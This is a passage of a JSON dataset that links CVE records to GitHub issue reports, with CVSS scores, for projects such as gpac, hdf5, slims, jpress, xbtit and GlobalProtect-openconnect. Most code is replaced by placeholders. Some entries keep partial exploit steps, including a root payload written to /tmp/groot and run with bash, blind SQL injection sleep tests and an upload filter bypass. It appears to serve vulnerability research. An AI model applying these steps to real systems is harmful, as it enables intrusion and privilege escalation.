        "description": "FILETAG look at APITAG It allows us to pass in any parameter and has no filter FILETAG FILETAG After that we just need to find a place to upload the file we visist APITAG \uff0cand upload APITAG with APITAG in APITAG look at funtion APITAG FILETAG Just the postfix checksum from the configuration file we just modified\uff0cI think you should add a separate blacklist that doesn't allow php files to be uploaded and then click upload wo find , successfully upload! FILETAG you must know what it is. FILETAG then we exploit it. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45380",
        "Issue_Url_old": "https://github.com/source-trace/appcms/issues/8",
        "Issue_Url_new": "https://github.com/source-trace/appcms/issues/8",
        "Repo_new": "source-trace/appcms",
        "Issue_Created_At": "2021-12-16T01:16:21Z",
        "description": "XSS injection vulnerability exists in PATHTAG FILETAG APITAG $_GET FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45385",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/47",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/47",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2021-12-16T03:01:01Z",
        "description": "SEGV in APITAG at APITAG This segment fault error is because in APITAG , when bmp's size is out of range, it returns without assign memory buffer to APITAG and did not exit the program. So the program crashes when it tries to access the APITAG , which is a invalid memory address. Test Environment Ubuntu NUMBERTAG bit ffjpeg (master d5cfd NUMBERTAG How to trigger APITAG POC FILE URLTAG Details gdb report CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45386",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/687",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/687",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2021-12-17T07:24:34Z",
        "description": "Bug] Two reachable assertions in APITAG and APITAG Describe the bug There are two reachable assertions in APITAG APITAG and APITAG APITAG when the user uses tcpprep to open a crafted pcap file. To Reproduce Steps to reproduce the behavior NUMBERTAG get the tcpreplay source code (master NUMBERTAG ca NUMBERTAG e3) and build it NUMBERTAG run the cmd: APITAG The poc file could be downloaded in here: [POC_add_tree_ip NUMBERTAG URLTAG POC_add_tree_ip NUMBERTAG URLTAG Expected behavior Program reports assertion failure and is terminated. Screenshots GDB report of POC_add_tree_ip NUMBERTAG ERRORTAG GDB report of POC_add_tree_ip NUMBERTAG ERRORTAG System (please complete the following information): OS: Ubuntu OS version NUMBERTAG Tcpreplay Version NUMBERTAG master NUMBERTAG ca NUMBERTAG e3)",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45429",
        "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/1616",
        "Issue_Url_new": "https://github.com/virustotal/yara/issues/1616",
        "Repo_new": "virustotal/yara",
        "Issue_Created_At": "2021-12-15T18:01:26Z",
        "description": "Possible insecure pointer conversion in APITAG leading to global buffer overflow. version: master (commit URLTAG command: yara $FILE strings APITAG is a file that can contain any string, such as \"hello\". Here is the trace reported by ASAN: ERRORTAG Commit APITAG introduced a configuration case called APITAG , which will treat the APITAG pointer as a APITAG pointer NUMBERTAG bit). The dereferece operation after this will read NUMBERTAG bits from src. URLTAG Note that, in cli/yara.c, a pointer to the NUMBERTAG bit integer APITAG is passed to APITAG . As a result, APITAG will read NUMBERTAG bits from a NUMBERTAG bit variable. This caused the ERROR reported by ASAN. URLTAG URLTAG A potential damage of this is that an attacker who obtains control of APITAG 's next NUMBERTAG bytes in the memory can further set the higher NUMBERTAG bits of APITAG to arbitrary values and launch exhaustive attacks.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45459",
        "Issue_Url_old": "https://github.com/dwisiswant0/advisory/issues/4",
        "Issue_Url_new": "https://github.com/dwisiswant0/advisory/issues/4",
        "Repo_new": "dwisiswant0/advisory",
        "Issue_Created_At": "2021-08-05T09:12:53Z",
        "description": "OS Command Injection in huntr NUMBERTAG e NUMBERTAG d NUMBERTAG d NUMBERTAG cb NUMBERTAG d0b cb7c NUMBERTAG ac NUMBERTAG Description _TBD_ CVE ID : _N/A_ References _URL_",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45746",
        "Issue_Url_old": "https://github.com/WeBankPartners/wecube-platform/issues/2297",
        "Issue_Url_new": "https://github.com/webankpartners/wecube-platform/issues/2297",
        "Repo_new": "webankpartners/wecube-platform",
        "Issue_Created_At": "2021-11-23T08:43:10Z",
        "description": "Path Manipulation. URLTAG URLTAG URLTAG We found 'file' may be contaminated on line NUMBERTAG of APITAG of unfiltered data in selection of requested application file path could lead to sensitive data disclosure and potential theft of proprietary business logic.It will affect on line NUMBERTAG of APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45760",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1966",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1966",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T11:00:37Z",
        "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45761",
        "Issue_Url_old": "https://github.com/Boyan-MILANOV/ropium/issues/32",
        "Issue_Url_new": "https://github.com/boyan-milanov/ropium/issues/32",
        "Repo_new": "boyan-milanov/ropium",
        "Issue_Created_At": "2020-07-02T10:19:24Z",
        "description": "Invalid memory address dereference in APITAG An issue was discovered in APITAG NUMBERTAG An invalid memory address dereference was discovered in APITAG The vulnerability causes a segmentation fault and application crash. POC CODETAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45762",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1978",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1978",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-11T09:10:17Z",
        "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45763",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1974",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1974",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-11T01:02:59Z",
        "description": "Invalid call in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45764",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1971",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1971",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T15:59:06Z",
        "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45767",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1982",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1982",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-14T02:23:22Z",
        "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG CODETAG Result The result is omitted here. gdb The gdb result is omitted here.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45769",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/368",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/368",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2021-12-23T00:53:55Z",
        "description": "NULL Pointer Dereference in APITAG NULL Pointer Dereference in APITAG Description A NULL Pointer Dereference was discovered in APITAG at PATHTAG The vulnerability causes a segmentation fault and application crash. version NUMBERTAG eeb6f0 System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz Proof of Concept poc APITAG command: APITAG Result ERRORTAG gdb ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45773",
        "Issue_Url_old": "https://github.com/mz-automation/lib60870/issues/100",
        "Issue_Url_new": "https://github.com/mz-automation/lib60870/issues/100",
        "Repo_new": "mz-automation/lib60870",
        "Issue_Created_At": "2021-12-23T06:01:26Z",
        "description": "NULL Pointer Dereference in APITAG NULL Pointer Dereference in APITAG Description A NULL Pointer Dereference was discovered in APITAG at PATHTAG The vulnerability causes a segmentation fault and application crash. If the APITAG is NULL, APITAG will crash. Should there be a check? version NUMBERTAG d5e NUMBERTAG e System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz gdb ERRORTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45786",
        "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/747",
        "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/747",
        "Repo_new": "magicblack/maccms10",
        "Issue_Created_At": "2021-11-12T07:46:08Z",
        "description": "There is an arbitrary user login vulnerability. View the login code\uff0c FILETAG In addition to logging in through the user name and password, you can also log in through the \"col\" and \"openid\" parameters, But these two parameters are completely controllable. That causing any user to login vulnerability poc\uff1a APITAG Local test results\uff1a APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45787",
        "Issue_Url_old": "https://github.com/magicblack/maccms10/issues/746",
        "Issue_Url_new": "https://github.com/magicblack/maccms10/issues/746",
        "Repo_new": "magicblack/maccms10",
        "Issue_Created_At": "2021-11-11T07:08:11Z",
        "description": "\u7f51\u7ad9\u540e\u53f0\u5b58\u6dfb\u52a0\u89c6\u9891\u5904\u5b58\u5728\u5b58\u50a8\u578bXSS\u6f0f\u6d1e. APITAG FILETAG \u63d2\u5165\u7684xss\u4ee3\u7801\u4e5f\u4f1a\u5728\u524d\u53f0\u88ab\u6267\u884c FILETAG APITAG \u53e6\u5916\uff0c\u540e\u53f0\u6dfb\u52a0\u6587\u7ae0\u5904\u4e5f\u6709\u76f8\u540c\u95ee\u9898",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-45791",
        "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/200",
        "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/200",
        "Repo_new": "slims/slims8_akasia",
        "Issue_Created_At": "2021-12-21T07:05:29Z",
        "description": "Security Bugs] Multiple Sql Injection. Hello, I found some serious bugs in Slims8 Akasia NUMBERTAG latest version). First of all, there is a SQL injection bug. This injection exists in multiple files, and the file where the search keyword $_GET['dir'] is located all has SQL injection. url:[ URLTAG url CODETAG '.urldecode($_GET $_fld_sort]).' CODETAG You have escaped the dir string. But in fact it just appends a backslash \\ before', \"or \\. Reference from PHP mysql_real_escape_string Therefore, if my GET variable dir does not contain these characters, sql injection will be triggered. SQL injection demonstration APITAG SQL injection demonstration APITAG Example: [ URLTAG url APITAG APITAG List some pages with SQL injection: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45792",
        "Issue_Url_old": "https://github.com/slims/slims9_bulian/issues/122",
        "Issue_Url_new": "https://github.com/slims/slims9_bulian/issues/122",
        "Repo_new": "slims/slims9_bulian",
        "Issue_Created_At": "2021-12-22T08:39:34Z",
        "description": "APITAG APITAG cross site script attacks\uff08xss\uff09. Describe the bug Storage type xss exists in Custom Field Editor in PATHTAG file. There is no effective defense against the NOTE field, leading to cross site script attacks. To Reproduce Steps to reproduce the behavior: Storage type xss exists in Custom Field Editor in PATHTAG file. There is no effective defense against the NOTE field, leading to cross site scripting attacks. Administrator login \"system\" add new \"field> fill in cross site scripting in the NOTE field APITAG It will take effect after saving. Expected behavior You can insert js scripts to attack. Screenshots APITAG APITAG Desktop : OS: APITAG M1] Browser APITAG Version APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-45793",
        "Issue_Url_old": "https://github.com/slims/slims9_bulian/issues/123",
        "Issue_Url_new": "https://github.com/slims/slims9_bulian/issues/123",
        "Repo_new": "slims/slims9_bulian",
        "Issue_Created_At": "2021-12-22T09:49:53Z",
        "description": "APITAG Bugs] Sql Injection. SQL injection exists in the FILETAG file. There is no effective defense against the comment field, leading to SQL injection attacks. Ordinary user login \"find a book\" SQL injection attack in the comments (example: APITAG ) APITAG APITAG CODETAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45794",
        "Issue_Url_old": "https://github.com/slims/slims9_bulian/issues/124",
        "Issue_Url_new": "https://github.com/slims/slims9_bulian/issues/124",
        "Repo_new": "slims/slims9_bulian",
        "Issue_Created_At": "2021-12-22T14:29:35Z",
        "description": "APITAG Bugs] SQL Injection. SQL injection exists in the PATHTAG file. There is no effective defense against the comment field, leading to SQL injection attacks. The link is: APITAG Vulnerable parameter id SQL injection payload CODETAG CODETAG APITAG The problematic code CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45806",
        "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/166",
        "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/166",
        "Repo_new": "jpressprojects/jpress",
        "Issue_Created_At": "2022-01-09T08:23:43Z",
        "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6a21\u677f\u4fee\u6539. \u5ba1\u8ba1\u8fc7\u7a0b APITAG APITAG APITAG ERRORTAG \u6548\u679c\u6f14\u793a APITAG FILETAG \u70b9\u51fb\u66f4\u65b0\u6587\u4ef6 FILETAG \u8bbf\u95ee URLTAG \uff0c\u8ba1\u7b97\u5668\u5f39\u51fa\uff0c\u9a8c\u8bc1\u6210\u529f FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45807",
        "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/167",
        "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/167",
        "Repo_new": "jpressprojects/jpress",
        "Issue_Created_At": "2022-01-09T08:36:56Z",
        "description": "jfinal\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6076\u610f\u63d2\u4ef6. \u5ba1\u8ba1\u8fc7\u7a0b jpress\u540e\u53f0\u63d0\u4f9b\u4e86\u63d2\u4ef6\u5b89\u88c5\u529f\u80fd\uff0c\u5728 APITAG \u7684 APITAG \u65b9\u6cd5\uff0c\u8be5\u65b9\u6cd5\u7684\u4f5c\u7528\u662f\u5148\u5904\u7406\u6587\u4ef6\u4e0a\u4f20\uff0c\u7136\u540e\u8fdb\u884c\u63d2\u4ef6\u5b89\u88c5 FILETAG \u6587\u4ef6\u4e0a\u4f20\u7684\u6b65\u9aa4\u7565\uff0c\u76f4\u63a5\u770b\u5b89\u88c5\u90e8\u5206 FILETAG \u8ddf\u8fdb APITAG \u65b9\u6cd5\uff0c\u5728\u8fd9\u4e2a\u65b9\u6cd5\u4e2d\uff0c\u5148\u8c03\u7528\u4e86\u4e00\u4e0b APITAG \u8bfb\u53d6\u63d2\u4ef6\u4fe1\u606f FILETAG \u8ddf\u8fdb APITAG \uff0c\u5728\u8fd9\u4e2a\u65b9\u6cd5\u91cc\u9762\u4f1a\u521b\u5efa\u4e00\u4e2a\u7c7b\u52a0\u8f7d\u5668\u6765\u52a0\u8f7d\u63d2\u4ef6\u91cc\u7684\u7c7b FILETAG \u8ddf\u8fdb APITAG APITAG \u5148\u52a0\u8f7d\u7c7b FILETAG APITAG FILETAG \u63a5\u4e0b\u6765\u5728\u5904\u7406\u8bf7\u6c42\u65f6\u5c31\u4f1a\u5229\u7528\u5230\u8fd9\u4e9bcontroller NUMBERTAG FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45808",
        "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/173",
        "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/173",
        "Repo_new": "jpressprojects/jpress",
        "Issue_Created_At": "2022-01-09T08:55:24Z",
        "description": "jpress\u524d\u53f0\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45809",
        "Issue_Url_old": "https://github.com/yuezk/GlobalProtect-openconnect/issues/113",
        "Issue_Url_new": "https://github.com/yuezk/globalprotect-openconnect/issues/113",
        "Repo_new": "yuezk/globalprotect-openconnect",
        "Issue_Created_At": "2021-12-21T13:35:33Z",
        "description": "Trivially Exploitable Priviledge Escalation Vulnerability. The way APITAG Openconnect is set up enables arbitrary users to execute commands as root NUMBERTAG Install the payload; in this case, a demonstration payload installing itself to PATHTAG echo e ' PATHTAG NUMBERTAG PATHTAG a NUMBERTAG PATHTAG > /tmp/groot; bash /tmp/groot NUMBERTAG Specify openconnect parameters: APITAG NUMBERTAG Log into any VPN service This vulnerability can be executed by any user, even a \"nobody\" user covertly by sending commands to the APITAG . This vulnerability can be executed by a user with keyboard access to install a rootkit using the GUI you provided. This vulnerability can be executed as soon as openconnect globalprotect is installed; even if the APITAG systemd service has not been started as the unit file specifies: APITAG . I had to explicitly mask the service to mitigate the vulnerability. As such, it leaves any host who even has the program installed highly vulnerable; this is the worst case among privilege escalation vulnerabilities. For a secure by default configuration, openconnect global needs to be updated, so administrator approval is needed to allow specific globalprotect servers or a change in command line parameters. I propose a root editable configuration file /etc/openconnect APITAG with the following syntax karolin . APITAG i cupdev PATHTAG This entry allows the user karolin to connect to any vpn servers with a domain suffix APITAG and the specified openconnect parameters. Groups may be specified by prefixing the user with APITAG . The app could implement a config editing feature, allowing users to edit the configuration graphically after specifying the administrator password. I would also suggest disabling systemd dbus activation altogether just to avoid the entire issue of a security bug sticking around even with a stopped unit. Thank you for all your hard work!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45810",
        "Issue_Url_old": "https://github.com/yuezk/GlobalProtect-openconnect/issues/114",
        "Issue_Url_new": "https://github.com/yuezk/globalprotect-openconnect/issues/114",
        "Repo_new": "yuezk/globalprotect-openconnect",
        "Issue_Created_At": "2021-12-21T13:37:56Z",
        "description": "Easy to exploit host traffic redirection vulnerability. Joining a VPN does not require administrator access; a malicious party hosting any openconnect server can redirect the host's network traffic over via their own server. This vulnerability is executed by\u2026simply logging into their own server. The same preconditions apply as to NUMBERTAG Note that hosting a global protect server is not necessary, if commands are sent directly to the DBUS service. In this case, hosting any openconnect supported VPN server will suffice. Proposed Fix See NUMBERTAG as both vulnerabilities have the same fix.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45821",
        "Issue_Url_old": "https://github.com/btiteam/xbtit-3.1/issues/6",
        "Issue_Url_new": "https://github.com/btiteam/xbtit-3.1/issues/6",
        "Repo_new": "btiteam/xbtit-3.1",
        "Issue_Created_At": "2021-12-22T20:18:47Z",
        "description": "Blind SQL Injection affecting Xbtit NUMBERTAG and APITAG NUMBERTAG Description A blind SQL Injection vulnerability exists in Xbtit NUMBERTAG and APITAG NUMBERTAG ia the sid parameter (GET) in FILETAG file that is accessible by a simple registered user with default privileges. As a result a malicious user can extract sensitive data such as usernames and passwords and in some cases use this vulnerability in order to gain remote code execution. FILETAG APITAG NUMBERTAG FILETAG sid parameter) affecting Xbtit NUMBERTAG and APITAG NUMBERTAG Login as a simple user make a comment in the chat box. The sid parameter is vulnerable to an authenticated blind SQL injection. Use the following APITAG and cause a sleep delay for NUMBERTAG seconds to manually test if the vulnerability exists. Note that you must be logged in as a simple user and the sid parameter must be a valid chat message id you have already generated! APITAG FILETAG FILETAG FILETAG FILETAG APITAG APITAG APITAG NUMBERTAG is also affected by the same issue. APITAG NUMBERTAG FILETAG msgid parameter) affecting only APITAG NUMBERTAG APITAG NUMBERTAG has additionally functionality on the file named ( FILETAG ) that has a vulnerable GET\u00a0id parameter (msgid) that offers almost similar functionality. So we can apply the same on /chatedit.php instead of FILETAG and msgid (GET) instead of sid (GET) parameter. The following APITAG will cause a sleep delay for NUMBERTAG seconds to manually test if the vulnerability exists. Note that you must be logged in as a simple user and the msgid parameter must be a valid chat message id you have already generated. APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45822",
        "Issue_Url_old": "https://github.com/btiteam/xbtit-3.1/issues/7",
        "Issue_Url_new": "https://github.com/btiteam/xbtit-3.1/issues/7",
        "Repo_new": "btiteam/xbtit-3.1",
        "Issue_Created_At": "2021-12-22T20:25:58Z",
        "description": "Stored & Reflected XSS affecting Xbtit NUMBERTAG and APITAG NUMBERTAG Reflected XSS The / FILETAG ?page=torrent details is actually FILETAG called through page parameter from APITAG The id parameter (GET ) is vulnerable to Reflected XSS. The APITAG contains the following xss payload ERRORTAG FILETAG FILETAG Stored XSS The FILETAG page is vulnerable to Stored XSS thought the n parameter (POST). This is the modified POST request to send a message to the chat box that contains the following APITAG XSS payload appended to the n parameter (POST) in URL encoded format that contains the username of the user that will post the message. ERRORTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-45829",
        "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1317",
        "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1317",
        "Repo_new": "hdfgroup/hdf5",
        "Issue_Created_At": "2021-12-18T13:57:17Z",
        "description": "segmentation fault in h5stat. Version: APITAG System information APITAG command: APITAG FILETAG result segmentation fault ASAN information CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45830",
        "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1314",
        "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1314",
        "Repo_new": "hdfgroup/hdf5",
        "Issue_Created_At": "2021-12-18T13:32:06Z",
        "description": "heap buffer overflow APITAG PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG result segmentation fault ASAN information ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45831",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1990",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1990",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-14T11:19:27Z",
        "description": "Null Pointer Dereference in __strlen_a NUMBERTAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG Gdb information CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45832",
        "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1315",
        "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1315",
        "Repo_new": "hdfgroup/hdf5",
        "Issue_Created_At": "2021-12-18T13:38:31Z",
        "description": "stack overflow at PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG result segmentation fault ASAN information ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-45833",
        "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1313",
        "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1313",
        "Repo_new": "hdfgroup/hdf5",
        "Issue_Created_At": "2021-12-18T13:08:16Z",
        "description": "stack buffer overflow at APITAG PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG ASAN information ERRORTAG",
